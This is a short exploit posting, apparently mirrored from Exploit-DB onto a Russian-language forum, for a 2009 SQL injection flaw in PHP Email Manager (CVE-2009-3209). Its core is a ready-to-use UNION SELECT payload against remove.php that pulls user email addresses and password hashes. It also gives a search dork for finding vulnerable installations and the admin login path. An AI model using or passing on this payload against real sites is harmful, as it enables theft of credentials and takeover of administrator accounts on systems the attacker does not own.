- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9470
- Проверка EDB
-
- Пройдено
- Автор
- MUSHTAQ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3209
- Дата публикации
- 2009-08-18
Код:
===========================================|->
~ Mtrb3 hena [Security-Code] ~
===========================================|->
script :-> PHP Email Manager < Remote SQL Injection Vulnerability >
Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html
Dork:->PHPEmailManager
Found by :-> [ MuShTaQ ]
from :-> [WwW.SeC-CoDe.com]
C0ntact :[email protected]
===========================================|->
~ Exploit ~
===========================================|->
File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]
Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--
Admin Login:-> http//www.site.com/PHPEmailManager/login.php
-:::::::::::::::::: GreeetZ:::::::::::::::::-
Sniper.vb , Mr.Nrfzh,and all friends
Bay Bay
# milw0rm.com [2009-08-18]- Источник
- www.exploit-db.com
